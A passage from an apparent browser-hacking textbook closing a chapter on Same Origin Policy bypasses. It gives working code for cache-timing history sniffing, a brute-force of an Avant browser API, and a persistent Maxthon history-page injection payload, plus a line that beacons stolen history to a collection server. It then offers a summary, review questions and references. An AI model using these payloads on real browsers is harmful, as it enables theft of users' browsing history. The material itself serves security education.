     * resource is cached.
     */
    confirmed_visited = true;
    maybe_test_next();
  }
}
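The snippet relies on a maybe_test_next() helper that isn't shown here. Based on the comments above, a simplified version might look like the following sketch: the urls array, the current index, the reset delay, the TIME_LIMIT value and the record_hit() reporting function are illustrative assumptions, while the f IFrame and the wait_for_noread() function come from the snippet above. The complete, merged PoC is available at the URLs given after Figure 4-23.

// Globals shared with wait_for_noread(); the TIME_LIMIT value is an
// illustrative assumption.
var confirmed_visited = false, cycles = 0, TIME_LIMIT = 90;
var urls = ['http://wikileaks.org/squelettes/random.js',
            'http://www.abovetopsecret.com/forum/ats-scripts.js'];
var current = -1;

function maybe_test_next() {
  // Report the previous probe if the trapped SOP violation confirmed a hit.
  if (current >= 0 && confirmed_visited) record_hit(urls[current]);
  // Abort the current load so an uncached resource never taints the cache.
  frames['f'].location = 'about:blank';
  confirmed_visited = false;
  cycles = 0;
  if (++current >= urls.length) return; // all resources tested
  // Give the about:blank navigation a moment, then probe the next URL.
  setTimeout(function () {
    frames['f'].location = urls[current];
    setTimeout(wait_for_noread, 1);
  }, 10);
}

maybe_test_next(); // kick off probing of the first URL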

When an SOP violation is trapped before a specific time-out, it means the cache is being hit. This confirms that the resource is cached, and from this you can infer the user has visited the website where the resource was loaded from. Figure 4-23 demonstrates this behavior.

Figure 4-23: SOP violation errors


You can read the full source code of this technique on the https://browserhacker.com website, or on the Wiley website at www.wiley.com/go/browserhackershandbook, where the original three PoCs have been modified and merged into a single code snippet.

Inspired by Zalewski’s research, Mansour Behabadi46 discovered another technique that relied on the loading of images instead. The technique currently only works on WebKit- and Gecko-based browsers. When your browser has previously cached an image, it usually takes less than 10 milliseconds to load it from the cache. However, when the image is not present in the browser’s cache, the retrieval from the Internet is subject to network latency and image size. Using this timing information, you can infer whether a target’s browser has previously visited websites. The following is an example of how this technique works:

// check if twitter was visited
var url = "https://twitter.com/images/spinner.gif";
var loaded = false;
var img = new Image();
var start = new Date().getTime();
img.src = url;
var now = new Date().getTime();
if (img.complete) {
  delete img;
  console.log("visited");
} else if (now - start > 10) {
  delete img;
  window.stop();
  console.log("not visited");
} else {
  console.log("not visited");
}

If you open this code snippet in Firefox or Chrome, and you had previously visited Twitter, you should see “visited” printed in the browser console (Firebug or Developer Tools). Alternatively, if the image takes longer than 10 milliseconds to load because it’s not cached and is being retrieved from the Twitter website, you should see “not visited.”

Keep in mind that an additional limitation of this technique is that the resource you want to check, for example http://twitter.com/images/spinner.gif, might be changed by the time you read this book. This is already the case for some of the resources used in the original PoC by Zalewski.

Because both of these techniques rely on specific, and short, timings when reading from the cache, they’re both very sensitive to machine performance. This is particularly the case with the second technique, where the timing is “hard-coded” to 10ms. For example, if you’re playing an HD video on YouTube while your machine is extensively using CPU and IO, the accuracy of the results may decrease.

Using Browser APIs

Avant is a lesser-known browser that can swap between the Trident, Gecko and WebKit rendering engines. Roberto Suggi Liverani discovered an attack for bypassing the SOP using specific browser API calls in the Avant browser prior to 2012 (build 28). Let’s consider the following code that shows this issue:

var av_if = document.createElement("iframe");
av_if.setAttribute('src', "browser:home");
av_if.setAttribute('name','av_if');
av_if.setAttribute('width','0');
av_if.setAttribute('height','0');
av_if.setAttribute('scrolling','no');
document.body.appendChild(av_if);

var vstr = {value: ""};
// This works if Firefox is the rendering engine
window['av_if'].navigator.AFRunCommand(60003, vstr);
alert(vstr.value);

This code snippet loads the privileged browser:home address into an IFrame, and then executes the AFRunCommand() function from its navigator object. This function is an undocumented and proprietary API that Avant added to the DOM. During his research, Liverani brute-forced some of the integer values to be passed as the first parameter to the function. He found that by passing the value 60003 and a JSON object to the AFRunCommand() function, he was able to retrieve the full browser history.
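A hedged sketch of that brute-forcing approach is shown below. The command ID range and the console logging are assumptions made for illustration, and the AFRunCommand() call is only exposed on vulnerable Avant builds.

// Brute-force a range of Avant command IDs against the privileged frame.
// The 60000-60100 range and the logging are illustrative assumptions.
var nav = window['av_if'].navigator;
if (nav && typeof nav.AFRunCommand === 'function') {
  for (var id = 60000; id <= 60100; id++) {
    var out = {value: ""};
    try {
      nav.AFRunCommand(id, out);
      if (out.value) console.log('command ' + id + ' returned: ' + out.value);
    } catch (e) {
      // Unsupported command ID; keep going.
    }
  }
}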

This is clearly an SOP bypass because code running on an origin like http://browserhacker.com should not be able to read the contents of a privileged zone, such as browser:home, as occurred in this case. Executing the previous code snippet would result in a pop-up containing the browser history, as shown in Figure 4-24.

Figure 4-24: Calling the proprietary AFRunCommand function


A similar vulnerability has been found in Maxthon 3.4.5 build 2000. Maxthon is another web browser that, similar to Avant, exposes non-standard APIs to access files and even launch executables.

Roberto Suggi Liverani found47 that the content rendered in the about:history page does not have effective output escaping, which leads to exploitable conditions. If you trick a target into opening a link like the following, the malicious injection will persist in the history page:

http://172.16.37.1/malicious.html#" onload='alert(1)'<!--

The code contained in the onload attribute will execute every time the target checks the browser history. The interesting thing here is that the malicious JavaScript code is executed in a privileged context. The about:history page happens to be mapped to a custom Maxthon resource at mx://res/history/index.htm. Injecting code into this context allows you to steal all the history content. For example, the following code parses all the links in the history-list div:

links = document.getElementById('history-list').getElementsByTagName('a');
result = "";
for(var i=0; i<links.length; i++) {
  if(links[i].target == "_blank"){
    result += links[i].href+"\n";
  }
}
alert(result);

This payload could be packaged and delivered with the following link:

http://172.16.37.1/malicious.html#" onload='links=document.getElementById("history-list").getElementsByTagName("a");result="";for(i=0;i<links.length;i++){if(links[i].target=="_blank"){result+=links[i].href+"\n";}}alert(result);'<!--

It is important to note that this Cross-context Scripting (explored further in Chapter 7) vulnerability is persistent. After the malicious content has been loaded into the history page the first time, the code will execute every time the user revisits their history. When the user opens the browser history page, the result will be something similar to Figure 4-25.

Figure 4-25: The malicious code injected as a link is executed.


Naturally, to launch a real attack it would be necessary to replace the alert() function with one of the hooking techniques discussed in Chapter 3. This way, the stolen browser history can be sent back to a collection server.
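For example, the alert(result) call in the payload could be swapped for a simple beacon back to a server you control. The collection endpoint below is a hypothetical placeholder:

// Instead of alert(result), exfiltrate the harvested history entries.
new Image().src = 'http://browserhacker.com/history?data=' +
    encodeURIComponent(result);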

These examples highlight a much bigger issue. Clearly, security researchers need to continue looking for weaknesses in software, in particular browsers. While these flaws were discovered against Avant and Maxthon, the attack surface of browsers will continuously evolve over time.

Even though it’s common for custom browsers to leverage technology such as WebKit and Gecko, it’s also fairly common for new APIs to be made available too. So get your fuzzing engines started!

Summary

This chapter has explored the SOP in greater detail as well as the importance of trying to bypass it when browser hacking. Bypassing the SOP allows hooked browsers to potentially become open proxies. Not only that, but the ability to read HTTP responses from different origins will increase the effectiveness of the attacks you will discover in the following chapters.

To reliably bypass the SOP, it’s important to understand the SOP in all its various incarnations. In its simplest form, the SOP considers resources having the same hostname, scheme and port as residing at the same-origin. If any of these attributes varies, the resource is in a different origin. Only resources from the same-origin are free to interact without restriction. Unfortunately, the SOP differs between various contexts and browsers. How the SOP behaves in the DOM compared to how it behaves in plugins is also often inconsistent.

With a grasp of how the SOP functions, you’re then confronted with a number of different ways to bypass the SOP, depending on the context of your attack. This chapter has provided multiple means to bypass the SOP, covering avenues of attack in Java, Adobe Reader, Adobe Flash, Silverlight, Internet Explorer, Safari, Firefox, Opera and even in cloud storage providers.

Once you’ve established the context of your bypass, you then have a number of benefits up your sleeve. From proxying requests through the target’s browser, to exploiting UI redressing attacks or even unveiling the user’s browser history, an SOP bypass will often prove invaluable in your browser hacking activities.

For browser developers, achieving a consistent and, most importantly, enforced SOP implementation across browser types, versions and plugins is a big challenge. The evolving number of new HTML5 features added to each major browser release exacerbates the challenge. This is part of the reason why SOP bypasses will continue to be so important in the future, both in terms of attack and defense.

Questions

1. What is the Same Origin Policy and why is it so important when dealing with browser security?

2. Why would achieving an SOP bypass be very interesting from the attacker’s point of view?

3. Explain how you can use the hooked browser as an HTTP proxy. What is the difference between using it with an SOP bypass and without?

4. Describe one of the Java SOP bypasses.

5. Explain how the Safari SOP bypass works.

6. Explain how the latest Adobe Reader SOP bypass is related to XML External Entity vulnerabilities.

7. Describe an example of Clickjacking.

8. Describe an example of Filejacking.

9. How have browser history hacks historically evolved? Describe one of the latest attacks based on cache timing.

10. Why is analyzing browser APIs important? Describe one of the attacks on the Avant or Maxthon browser.

For answers to the questions please refer to the book’s website at https://browserhacker.com/answers or the Wiley website at: www.wiley.com/go/browserhackershandbook.

Notes

1. Oracle. (2009). URL class. Retrieved May 11, 2013 from http://docs.oracle.com/javase/6/docs/api/java/net/URL.html#equals(java.lang.Object)

2. Esteban Guillardoy. (2013). Keep calm and run this applet. Retrieved May 11, 2013 from http://immunityproducts.blogspot.co.uk/2013/02/keep-calm-and-run-this-applet.html

3. Oracle. (2013). What should I do when I see a security prompt from Java? Retrieved May 11, 2013 from https://www.java.com/en/download/help/appsecuritydialogs.xml

4. Will Dormann. (2012). Don’t sign that applet. Retrieved May 11, 2013 from http://www.cert.org/blogs/certcc/2013/04/dont_sign_that_applet.html

5. Mozilla. (2012). LiveConnect. Retrieved May 11, 2013 from https://developer.mozilla.org/en/docs/LiveConnect

6. Neal Poole. (2011). Java Applet SOP Bypass via HTTP Redirect. Retrieved May 11, 2013 from https://nealpoole.com/blog/2011/10/java-applet-same-origin-policy-bypass-via-http-redirect/

7. Frederik Braun. (2012). Origin Policy Enforcement in Modern Browsers. Retrieved from https://frederik-braun.com/publications/thesis/Thesis-Origin_Policy_Enforcement_in_Modern_Browsers.pdf

8. WebSense. (2013). How are Java attacks getting through. Retrieved August 4, 2013 from http://community.websense.com/blogs/securitylabs/archive/2013/03/25/how-are-java-attacks-getting-through.aspx

9. Bit9. (2013). Most enterprise networks riddled with vulnerable Java installations. Retrieved August 4, 2013 from http://www.networkworld.com/news/2013/071813-most-enterprise-networks-riddled-with-271939.html

10. Eric Romang. (2013). Oracle Java Exploits and 0 days Timeline. Retrieved August 4, 2013 from http://eromang.zataz.com/uploads/oracle-java-exploits-0days-timeline.html

11. CVEDetails. (2013). Adobe Acrobat Reader Vulnerability Statistics. Retrieved August 4, 2013 from http://www.cvedetails.com/product/497/Adobe-Acrobat-Reader.html?vendor_id=53

12. Adobe. (2005). Acrobat JavaScript Scripting Guide. Retrieved May 11, 2013 from http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf

13. Michal Zalewski. (2010). Same-origin policy for Silverlight. Retrieved May 11, 2013 from http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_Silverlight

14. Alex Kouzemtchenko. (2008). Same Origin Policy Weaknesses. Retrieved May 11, 2013 from http://powerofcommunity.net/poc2008/kuza55.pdf

15. 0x000000. (2008). Defeating The Same Origin Policy. Retrieved May 11, 2013 from http://mandark.fr/0x000000/articles/Defeating_The_Same_Origin_Policy..html

16. 0x000000. (2007). CVE-2007-3514. Retrieved May 11, 2013 from http://www.cvedetails.com/cve/CVE-2007-3514/

17. Gareth Heyes. (2012). Firefox knows what your friends did last summer. Retrieved May 11, 2013 from http://www.thespanner.co.uk/2012/10/10/firefox-knows-what-your-friends-did-last-summer/

18. Michael Coates. (2012). Security Vulnerability in Firefox 16. Retrieved May 11, 2013 https://blog.mozilla.org/security/2012/10/10/security-vulnerability-in-firefox-16/

19. Opera Software. (2012). Opera 12.10 Changelog. Retrieved May 11, 2013 from http://www.opera.com/docs/changelogs/unified/1210/

20. Gareth Heyes. (2012). Advisory: Cross domain access to object constructors can be used to facilitate cross-site scripting. Retrieved May 11, 2013 from http://www.opera.com/support/kb/view/1032/

21. Gareth Heyes. (2012). Opera x-domain with video tutorial. Retrieved May 11, 2013 from http://www.thespanner.co.uk/2012/11/08/opera-x-domain-with-video-tutorial/

22. Roi Saltzman. (2012). DropBox Cross-zone Scripting. Retrieved May 11, 2013 from http://blog.watchfire.com/files/dropboxadvisory.pdf

23. Roi Saltzman. (2012). Google Drive Cross-zone Scripting. Retrieved May 11, 2013 from http://blog.watchfire.com/files/googledriveadvisory.pdf

24. Veracode. (2012). Security Headers on the Top 1,000,000 Websites. Retrieved May 11, 2013 from http://www.veracode.com/blog/2012/11/security-headers-report/

25. Anton Rager. (2002). Advanced Cross Site Scripting Evil XSS. Retrieved May 11, 2013 from http://xss-proxy.sourceforge.net/shmoocon-XSS-Proxy.ppt

26. Stefano Di Paola and Giorgio Fedon. (2006). Subverting Ajax. Retrieved May 11, 2013 from http://events.ccc.de/congress/2006/Fahrplan/attachments/1158-Subverting_Ajax.pdf

27. Ferruh Mavituna. (2007). XSS Tunneling. Retrieved May 11, 2013 from http://labs.portcullis.co.uk/download/XSS-Tunnelling.pdf

28. Krzysztof Kotowicz. (2009). New Facebook clickjacking attack in the wild. Retrieved May 11, 2013 from http://blog.kotowicz.net/2009/12/new-facebook-clickjagging-attack-in.html

29. Jesse Ruderman. (2002). IFrame content background defaults to transparent. Retrieved May 11, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=154957

30. Robert Hansen and Jeremiah Grossman. (2008). Clickjacking. Retrieved May 11, 2013 from http://www.sectheory.com/clickjacking.htm

31. Rich Lundeen. (2012). BeEF Clickjacking Module and using the REST API to Automate Attacks. Retrieved May 11, 2013 from http://webstersprodigy.net/2012/12/06/beef-clickjacking-module-and-using-the-rest-api-to-automate-attacks/

32. Giorgio Maone. (2010). What is ClearClick and how does it protect me from Clickjacking? Retrieved May 11, 2013 from http://noscript.net/faq#qa7_4

33. Marcus Niemietz. (2012). Cursorjacking. Retrieved May 11, 2013 from http://www.mniemietz.de/demo/cursorjacking/cursorjacking.html

34. Krzysztof Kotowicz. (2012). Cursorjacking Again. Retrieved May 11, 2013 from http://blog.kotowicz.net/2012/01/cursorjacking-again.html

35. Sebastian Lekies, Mario Heiderich, Dennis Appelt, Thorsten Holz, and Martin Johns. (2012). On the fragility and limitations of current Browser-provided Clickjacking protection schemes. Retrieved May 11, 2013 from http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/clickjacking-woot12.pdf

36. Krzysztof Kotowicz. (2011). Filejacking: How to make a file server from your browser. Retrieved May 11, 2013 from http://blog.kotowicz.net/2011/04/how-to-make-file-server-from-your.html

37. Michal Zalewski. (2010). Drag-and-drop may be used to steal content across domains. Retrieved May 11, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=605991

38. Krzysztof Kotowicz. (2011). Cross domain content extraction with fake captcha. Retrieved May 11, 2013 from http://blog.kotowicz.net/2011/07/cross-domain-content-extraction-with.html

39. Zeljka Zorz. (2011). Facebook spammers trick users into sharing anti-CSRF tokens. Retrieved May 11, 2013 from http://www.net-security.org/secworld.php?id=11857

40. Luca De Fulgentis. (2012). UI Redressing Mayhem: Firefox 0day and the Leakedin Affair. Retrieved May 11, 2013 from http://blog.nibblesec.org/2012/12/ui-redressing-mayhem-firefox-0day-and.html

41. Andrew Clover. (2002). CSS visited pages disclosure. Retrieved May 11, 2013 from http://seclists.org/bugtraq/2002/Feb/271

42. Jeremiah Grossman. (2007). CSS History Hack. Retrieved May 11, 2013 from http://ha.ckers.org/weird/CSS-history-hack.html

43. David Baron. (2002). Bug 147777 - :visited support allows queries into global history. Retrieved May 11, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=147777

44. Edward W. Felten and Michael A. Schneider. (2000). Timing Attacks on Web Privacy. Retrieved May 11, 2013 from http://selfsecurity.org/technotes/websec/webtiming.pdf

45. Michal Zalewski. (2012). Rapid history extraction through non-destructive cache timing. Retrieved May 11, 2013 from http://lcamtuf.coredump.cx/cachetime/

46. Mansour Behabadi. (2012). visipisi. Retrieved May 11, 2013 from http://oxplot.github.com/visipisi/visipisi.html

47. Roberto Suggi Liverani. (2012). Maxthon––Cross Context Scripting (XCS)––about:history––Remote Code Execution. Retrieved May 11, 2013 from http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html